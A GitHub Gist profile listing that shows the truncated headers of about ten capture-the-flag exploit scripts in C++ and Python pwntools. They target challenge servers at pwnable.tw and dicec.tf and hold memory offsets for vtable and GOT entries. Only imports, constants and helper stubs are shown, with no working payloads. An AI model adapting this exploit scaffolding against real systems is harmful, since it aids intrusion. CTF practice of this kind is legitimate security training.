Skip to content

Instantly share code, notes, and snippets.

View hkraw's full-sized avatar

Harsh khuha hkraw

View GitHub Profile
#include <iostream>
#include <pwntools>
#include <string>
uint64_t vtable_offset = 0x210b60;
uint64_t openat_got_offset = 0x210fe8;
uint64_t libc_open_offset = 0xf6450;
class Ghost {
#include <pwntools>
#include <string>
#include <iostream>
using namespace pwn;
// Process io("./caov");
Remote io("chall.pwnable.tw", 10306);
void set(std::string name, std::string key,
uint32_t keyLen, int64_t value) {
#include <pwntools>
#include <vector>
#include <iostream>
#include <string>
#include <fstream>
#include <streambuf>
//Process io("./run.sh");
Remote io("dicec.tf", 31798);
#include <pwntools>
#include <vector>
#include <iostream>
#include <string>
#include <stdint.h>
//Process io("./sice_sice_baby");
Remote io("dicec.tf", 31914);
uint32_t* indexes;
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from binascii import hexlify, unhexlify
import random
import subprocess
# utils
def Create(name,size):
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
import subprocess
# exploit
def Pwn():
global io
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from IO_FILE import *
from time import sleep
import random
import subprocess
# addr
input_start = 0x602060
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
import subprocess
def PID():
print(subprocess.check_output(['pidof','still-printf']))
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import subprocess
import random
# Util
def Run(command):
io.sendline('RUN')
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from binascii import hexlify, unhexlify
import subprocess
import random
# Utils
def Encrypt(index,note=None,data=None):